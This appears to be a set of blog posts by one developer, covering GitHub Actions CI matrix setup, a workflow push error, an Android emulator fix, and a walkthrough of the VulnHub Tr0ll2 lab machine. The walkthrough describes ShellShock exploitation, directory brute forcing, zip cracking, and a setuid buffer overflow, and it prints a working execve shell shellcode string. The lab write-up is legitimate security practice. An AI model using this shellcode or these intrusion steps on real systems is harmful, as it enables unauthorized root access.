GitHub Actions, second round

After being capable of running build and test in my GitHub action workflow, it is time to experiment with matrix to have the build run on multiple OSes. This can be tricky if you use (like me) some Docker Images (Mongodb, SqlServer). This because when you choose Windows machine, you are using Windows Container services, not standard Docker for Windows. This means that you are not able to run standard Docker container based on linux, but you need to use Windows Container based image.

GitHub actions Windows based machines are running Windows Container, not Linux ones.

This is especially annoying for me because it seems that there is no SQL Server image available for Windows Server 2019.

image

Figure 1: Docker image for Sql Server does not support Windows Server 2019.

Ok, I’m forced to use Windows server 2016, when I really have preferred to use Windows 2019, that has a much better support for containers.

Apart these difficulties, GitHub actions saved my day because it allows me to specify new variables depending on matrix values, thus allowing me to use different container commands for different operating systems, as you can see in Figure 2.

image 

 

Figure 2: Different mssSql and mongContainer variable values depending on operating system.

Thanks to the include directive, I’m able to give different value to job variables, I’m creating two new variables: msssql and mongoContainer, that contain the command line to start MsSql server and MongoDb containers. This is important because, in Windows, the image of MsSql container gaves me problem if I use ‘ instead of “. With include directive I’m able to specify a completely different run command line for different operating system.

This is also fundamental because I need to use two different container images for MsSql, in fact they are different for different operating systems. With linux I can use mcr.microsoft.com/mssql/server:2017-latest-ubuntu, while for Windows 2016 (but not for Windows 2019) I should use microsoft/mssql-server-windows-developer.

Thanks to include: condition, I can change value for jobs variable depending on Matrix combinations

The net result was that my action now runs in both operating systems.

image

Figure 3: Action now runs on both operating systems, I still got error from mongo test because of problem in container in Windows, but this is a different story.

If I want to run my build and test also against .NET Core 3 Rc, I can simply add another value on dotnet matrix, et voilà, now I got 4 different runs of my workflow.

image

Figure 3: Running actions with matrix, cross product between all variables allows me to run action in different combination of operating system and .NET  Core framework.

Thanks to the max-parallel: setting, I ask to the system to run only two build in parallel, but with fail-fast equal to false I’m asking to GitHub to always run all the combination, even if one previous combination fails. This allows me to always have all four actions run, regardless of the outcome of a previous action.

I can also use Exclude to remove some combination from matrix cross product, in Figure 4 I’m excluding running for .NET core 3 on windows machine

SNAGHTML181d66

Figure 4: Excluding a specific combination from matrix combination

This will generate a total of three runs, I will build both version of framework in linux machine, but only 2.2.401 .net Framework on windows machine.

Include and exclude are powerful action configurations, that allows to configure differently the job or completely exclude some matrix combination, allowing for fine grained control on job parallelism.

Everything is really good, but here is some problems that I encountered while using Actions, but it is completely understandable because it is still in beta.

Running on Windows Machine is slower than Linux, I do not know if this is a problem of docker images, but in Figure 5 you can see timing of the action in Linux (red square) and in Windows (blue square). I suspect that Windows machine runs in a much slower hardware. Nevertheless, pay attention at timing, if you are building .NET core, probably linux is the best choice (better container support and faster in GitHub actions). 

SNAGHTML1d0571

Figure 5: Timing running the action in Linux and Windows machine

Another area where actions need improvement is the concept of a partially failing action, like we had for Years in Azure DevOps (TFS). The concept is: when I’m running a series of tests, I do not want the entire action job to stop if one of the test run fails, I want it to be reported failed, continue to the next step, and the entire action should be marked as “partially failing” if one of the job marked with continue-on-error failed. This kind of CI workflow is standard, do not stop the script, just continue and mark the single step as failed.

It is true that GitHub actions have a continue-on-error property, but it simply report the step as succeded even if it fails, this is a real annoying missing feature.

SNAGHTML41e080

Figure 6: Continue-on-error actually mark the step as succeeded even if it fails.

As you can see from Figure 6, step failed (2 test failed), but the it is marked as successful (due to continue-on-error) and the overall execution is green. This is a real missing feature for complex project where you want to execute every steps and visualize which steps failed.

This second wave of test confirmed me that GitHub actions is a powerful build system, but it still need in its early day and need more work to be really usable in complex projects.

Gian Maria.

GitHub Actions Error pushing with workflow modified

After creating a workflow for GitHub Action, if you try to modify the workflow locally then push to GitHub you can incur in strange error.

refusing to allow an integration to create or update .github/workflows/ci.yml

image

Figure 1: Error in pushing to Git Repository

The reason seems to be a different permission in auth token used for authentication, then to solve the problem you need to clear credentials then try again the operation. In Windows you need to use Credential Manager as I described in that old post. Just delete every entry for GitHub, then try to push again, you will be asked again for credentials and then you should be able to push.

image

Figure 2: I got the error, then clear credentials in Credential Manager, finally I was able to push again.

Let me know if you still have the error.

Gian Maria.

First Experience with GitHub Actions

GitHub actions is the new CI/CD system created by GitHub that allows you to build and release your software with a simple workflow defined in YAML file. Actually it is in beta, but you can simply request to be enlisted and your account will be enabled so you can try it in preview.

Actions engine is based on a yaml definition that is stored directly in code, there are lots of predefined actions made by GitHub team as well as custom actions that can be developed by the community.The real power rely on the fact that you can use simply use command line and docker commands, making the creation of a release a simple and smooth process.

Adding a new workflow is really simple, just open the Actions tab of the repository, then ask to create a new worfklow:

image

Figure 1: Create new workflow for GitHub action directly from repository page.

This will simply create a new yml file in a directory called .github and you can immediately start editing the build. The syntax is really simple and it aims to simplicity rather than complexity. The vast majority of tasks can be simple accomplished inserting command line arguments.

My first impression is that the strongest point of GitHub actions is simplicity and easy to use.

Here is the first part of workflow definition:

name: NStore CI

on: [push]

jobs:
  build:
    runs-on: ${{ matrix.os }}
    strategy:
      matrix:
        dotnet: [ '2.2.401', '3.0.100-preview9-014004'] 
        os: ['ubuntu-latest']
    name: Build for .NET ${{ matrix.dotnet }}
    steps:

You can find complete workflow syntax at this page, but here is the explanation of my workflow. First of all on: [push] directive asks for continuous integration (run action for each push), then a list of jobs follows.

First and only job for this example is called build and it could run on different operating system. This is a nice feature of actions called matrix: you can define array of values and use those arrays in workflow definition to have it run multiple time, once for each parameter combination. Array of values are defined inside the strategy.matrix section, where I defined two distinct set of parameters, dotnet (version of dotnet core used to build) and os (type of machine where my action should be run). For this example I’m going to use only framework version as matrix value.

Runs-on step define OS, for this example I’m using ubuntu-latest. Finally I give a name to the job: Build for .NET following the actual version of matrix.dotnet value. When I push the code I can verify that two distinct jobs are scheduled.

image

Figure 2: Two distinct job where scheduled, one for each matrix version.

This is a really nice feature because we can specify a single workflow and have GitHub action engine run it with different configuration.

Thanks to Matrix configuration a single job can be run for many different combination of input parameters.

A job is simply composed by different steps, for my solution, I wants only to build my solution and run some tests agains Microsoft Sql Server and MongoDb

steps:     
    - uses: actions/checkout@v1
    
    - name: Setup .NET Core
      uses: actions/setup-dotnet@v1
      with:
        dotnet-version: ${{ matrix.dotnet }}
      
    - name: Build with dotnet
      run: dotnet build src/NStore.sln --configuration Release
    
    - name: Start Docker for MSSSql
      run: docker run -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=sqlPw3$secure' -e 'MSSQL_PID=Developer' -p 1433:1433 --name msssql -d mcr.microsoft.com/mssql/server:2017-latest-ubuntu
      
    - name: Start Docker for Mongodb
      run: docker run -d -p 27017:27017 mongo
      
    - name: Dump mssql docker logs
      run: docker logs msssql
      
    - name: Run Tests - Core
      run: dotnet test src/NStore.Core.Tests/NStore.Core.Tests.csproj --configuration Release --no-build

    - name: Run Tests - Domain
      run: dotnet test src/NStore.Domain.Tests/NStore.Domain.Tests.csproj --configuration Release --no-build
    
    - name: Run Tests - MongoDb
      env:
        NSTORE_MONGODB: mongodb://localhost/nstore
      run: dotnet test src/NStore.Persistence.Mongo.Tests/NStore.Persistence.Mongo.Tests.csproj --configuration Release --no-build
           
    - name: Run Tests - MsSql
      env:
        NSTORE_MSSQL: Server=localhost;user id=sa;password=sqlPw3$secure
      run: dotnet test src/NStore.Persistence.MsSql.Tests/NStore.Persistence.MsSql.Tests.csproj --configuration Release --no-build
    
    - name: Dump mssql docker logs after tests
      run: docker logs msssql
      
    - name: Run Tests - Sql Lite
      run: dotnet test src/NStore.Persistence.Sqlite.Tests/NStore.Persistence.Sqlite.Tests.csproj --configuration Release --no-build 

Workflows starts with actions/checkout@v1 a really standard action that simply clone and checkout the code, it is followed by another action that ensure that a specific version of .NET core SDK is installed and configured in the system. It is declared with the syntax uses: actions/setup-dotnet@v1 and allows me to use a specific version of .NET core; this action supports parameters, and is followed by a with: section used to pass parameters. This is another strong point of GitHub actions, it is really simple to declare and use actions, there is no need to install or reference anything, just reference the action in the right repository and the game is done.

The rest of the repository is a series of steps composed only by a name and a command line instruction. This allows me to simply issue dotnet command to restore, build, test my solution.

Another cool aspect of Actions is that Docker is available inside the machine, this allows me to run a couple of containers: SQL Server and MongoDb, to run my tests during a build. This is super cool, because it allows me to use Docker to create all prerequisites that I need for my build.

Having Docker inside the machine that runs actions is a real blessing because it allows to run integration tests.

My first impression is quite positive, with just a bunch of Yaml code I was able to create a workflow to build and run tests for my project (I spent a quite good amount of time to have MsSql container work, but this is another story).

Another good aspect of Actions is the ability to see real-time log of your run directly from a browser, without the need of installing anything.

A final real nice aspect of Actions is that they are defined by conventions inside a special folder .github/workflows; I’ve developed this build in a fork of the original project, then I issued a pull request and when the pull request was accepted, this new workflows appears in the original repository.

image

Figure 3: After pull request was merged, immediately the workflow is up and running on target repository..

Clearly this is still a beta and there are still part that should be improved. First of all, if a test run fails, the build is marked as failed and you need to look at test logs to understand which tests failed.

image

Figure 3: Build failed, but to understand why it failed you need to check the logs.

This is the reason why I included a distinct test step for each test assembly, instead of a simple dotnet run on the entire solution. Using this little trick I can at least understand which test run failed.

image

Figure 4: Action run result, each failed step is marked with a red cross

Clicking on failed step, you can find the output log of the step, needed to understand which tests failed and why. For those of you used to Azure DevOps pipeline, you will surely miss the nice Test Result page, but I’m expecting GitHub actions to close the gap in this area.

image

Figure 5: Action step run detail.

Another problem I found (but I need to investigate more) is that docker seems not to be available on MacOS Machine. If I run previous build on MacOS I got a docker command not found.

You only need to enlist in beta and start playing with Actions, you will surely find a good use for them.

Gian Maria.

Unable to use Android Emulator error ADB_VENDOR_KEY

I’m working with Xamarin, but in my workstation, where my user has no administrative right, I’m not capable of running the emulator, even if I start everything with administrative user.

Device unauthorieze ADB_VENDOR_KEY is not set

image

Figure 1: Error running the emulator.

I have a really similar identical setup on another computer, where the user is admin of the machine and everythign work. I’ve found some solution on the internet, but nothing worked, until I found some clue on the fact that, this error is somewhat related to google store.

image

Figure 2: Removing play store from emulator settings 

First step was removing the Google Play Store from emulator configuration, then I needed also to force a Cold boot, because for some reason, it just don’t work on my system.

image

 

Figure 3: Disable fast boot and force a cold boot

On a decent developer machine, ColdBoot is fast, so actualy it is absolute not a problem for me. Now I’m able to use the emulator in Xamarin.

Gian MAria.

Exploiting VulnHub Tr0ll2 machine

This is an unusual post, it deal on how I exploited Tr0ll2 machine of vulnhub. Practicing with real machine helps you to put in practice some of the stuff you learn on security. It was a real long time (almost 20 years) that I do not immerse myself in security, doing some exercise on the machine is good to spent some hours :).

I run all the machine in VMWare esxi servers, in an isolated network, behind a router and a firewall with a DNS on my kali linux machine. I’m pretty cautious when I run some machine in my network so it is always good for me to have a complete separate network, completely isolated from my real work network. Thanks to VmWare I can simply use the console to access the machine even if cannot contact directly through the network.

First of all I’m cheking DHCP server leases, to find the ip assigned to the troll machine an easy task.

image

Figure 1: Just check the leases /var/lib/dhcp/dhcpd.leases to find ip of tr0ll2 machine

Now a simple nmap reveals port 80, 21 and 22 opened, starting with port 80 I’ve done some checks with burp suite, but I do not find anything useful, just standard troll image.

image

Figure 2: Nothing interesting in home page.

This type of machine does not need brute force, but remembering the first machine of the series, I checked the robots.txt, it reveals a series of possible subdirectories. To avoid testing every entry manually simply save the file and then use software like dirb or OWASP DirBuster to brute force every entry in the file.

image

Figure 3: Some directories found by dirbuster

In all 4 directories we found the very same image, but saving all images on disk, one is slightly lager than the other. Using strings program you can notice a strange string embedded in the image.

image

Figure 4: String embedded in the image.

After some tentative (I’ve tried various stuff on the web site) it comes the light at the end of the tunnel, maybe y0ur_self is some file or directory in the web service, voila, another hidden directory.

image

Figure 5: Content of hidden folder, a file with anwers.

Opening the file I found some encoded strings, it seems Base64, but there are lots of internet sites that can try various encoding for you to avoid losing time.

image

Figure 6: Ok, indeed it is a Base64 string :)

First thing to do is converting all these base64 strings into standard strings, few lines of Python code solved the problem.

image

Figure7: Decode with python, as you can see I’m using Visual Studio Code for the task.

Once I’ve a nice file with lots of strings, the obvious thing to do is trying these password on ssh or ftp, sadly enough, nothing worked. I tried root for the user (I’m pretty sure that is not the user because it would be too easy), I’ve tried Tr0ll user (because of the username in the home page of the site), but nothing.

Now I need to admit I cheated, after being stuck for a while, after hydra and various other tool to brute force either ftp or ssh I’ve searched for an hint in the internet Open-mouthed smile

I was a little bit disappointed because the next step is not really logical, the ftp user is Tr0ll with Tr0ll as password, I really did not though such easy solution.

Moving on, in the ftp I found a single zip file, protected with a password. Now the nice list of strings decoded contains the password for the zip file.

image

Figure 8: Cracking zip file.

Inside zip file there is another file, a nice RSA key file, used to log into ssh

image

Figure 9: Finally a key to login with SSH

I tried user Tr0ll without any success, then, since the file is called noob, I tried the user noob (remembering the trick of the ftp) and it worked, but no console available, I was kicked out immediately.

image

Figure 10: Trolled again Sad smile

Ok, now I need to understand why the ssh server kicked me out all of the time, using –v option I can ask for a verbose diagnostics of what is happening between client and server.

image

Figure 11: Debug of my ssh connection

Output is not really informative, but I tried googling everything, especially a particular string “remote: forced command” that suggested me that the server somewhat has a command whitelist. I found that it is possible to configure SSH only to execute certain commands, so I tried different command, nothing worked.

After some other time googling, I found that ssh forced command can be vulnerable to ShellShock, I was really excited and tried to open a shell exploiting ShellShock bug.

image

Figure 12: ShellShock worked and I was really trolled

HORRAY, ShellShock worked, I’m in but I cannot use ls to list files, pwd commands works, some other command works, but ls gives me permission denied. After browsing with find, for some reason I tried dir command, and LOL dir command works like ls, as you can see in Figure 12, this was the most Troll moment of this hack, I was really shocked Open-mouthed smile.

Once in you can find some interesting folders

image

Figure 13: Finally some interesting files

I found three distinct r00t files inside three folders, all are executables, but running them has the simple result of kicking me out of the ssh for a while. After being puzzled I realized that one of the file is bigger than the other, and it is always in a different place Smile, this explain because all three kicked me out of the ssh, I’ve run the file in door1, then door2, then door3, but probably it was always the same file. As for the images with strings inside, probably the file with different size was the interesting one.

image

Figure 14: Solution is near

Ok, now I’m really frustrated. The reason is, I’ve found a file that has setuid root, and does nothing than output the string I give it as input, thus, the author expects me to perform an exploit with stack overflow, because this is the typical test program used also in books like shellcodes handbook. Uff, more than 15 years that I do not smash a stack, lots of stuff changed with ALSR and other stuff, so I decided to call a day, and give it up, I had enough fun with the machine.

……
……

After a couple of days, I had still a bitter sensation in my mouth, I was near to finish the machine, I cannot surrender. Thanks a lot to Pluralsight (you guys have tons of exceptional courses) I’ve found a course on creating exploit with metasploit, and the TOC reveals that it could be a refresher for my rusty buffer overflow knowledge. The course was great and it gives me al the tool to try to do an exploit. R00t file is 32 bit, so I’ve not to deal with 64 bit stack, it turns out that it could be easier than I though.

Step1, use metasploit utility to create a payload that allows me to locate the offset to overwrite the EIP register. The utility is pattern_create.rb and given a length (in this example 300 chars) it generates a unique string that allows me to locate the right offset.

image

Figure 15: Pattern_create.rb in action.

Now I can launch the r00t program into gdb debugger (I’ve no fancy GUI debugger with ssh and shellshock, but luckly enough I’m old enough to be familiar with command line debugger). Just run gdb r00t then after the debugger starts type run followed by the arguments, using pattern of increasing length until you crashed the program.

image

Figure 16: Debugger show the crash and the instruction that causes segmentation fault.

The situation is the following, I’ve overwritten the stack with a specific sequence of chars generated by pattern_create.rb and the offending pointer is 0x6a413969, that is now the content of the EIP register, then next instruction pointer. Now I can use another tool called pattern_offset.rb

image

Figure 17: Pattern_offset allows me to easily find the offset.

As you can see in Figure 17, with metasploit, finding the offset is a breeze, the EIP overwrite location is as offset 268. Now I simply followed the instruction of Pluralsight course, trying to have a better understaing of what happened. Using Python is really simple to generate a pattern to verify the assumption

image

Figure 18: Creating a specific pattern to verify what is in memory

Using that specific pattern allows me to verify what is in stack memory after buffer overflow.

image

Figure 19: Registers after buffer overflow

Ok, the assumptions are right, the ebp registers contain a sequence of A characters, then EIP contains a sequence of B, this confirms that the offset is good. Now I dump memory pointed by the esp register to verify what is in the stack, and I found all letter C. Everything is good and ready to run. I will done a final test, and instead of using all C after the EIP pointer I put 40 bytes of \x90 (NOP instructions). Here is the result

image

Figure 20: Memory layout pointed by esp after the overflow

As you can see from Figure 20, at memory address pointed by esp (0xbffffb10) there are my 40 NOPs and then letters C. Now I only need a payload, remembering the book Shellcodes handbook I search for a simple execve shell on exploit-db and the result is

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

This is really nice, I really love shellcode is almost magic because it is binary code that can be forced into a program to be executed. Now I verify again the layout of the memory after the overflow with this new code

image

Figure 21: Buffer overflow is almost ready.

It is really important that you do this final run with the exact length of the payload, now from Figure 21 I can easily see my 40 NOPs SLED starting at 0xbffffb60, then my shellcode. As first tentative I tried to overwrite EIP with 0xbffffb68 (Figure 22, remember that x86 are little endian); if everything is ok, after the overflow the execution will jump into my NOP Sled and finally executes the shell code, launching a new bash with user root (remember that r00t program has setuid root)

image

Figure 22: Final Shell code

I was really excited and really surprised when it works at the very first tentative. Many tank to Gus Khawaja for his course, it gave me all the information that I need.

image

Figure 23: I’m Groot Smile with tongue out

Gian Maria.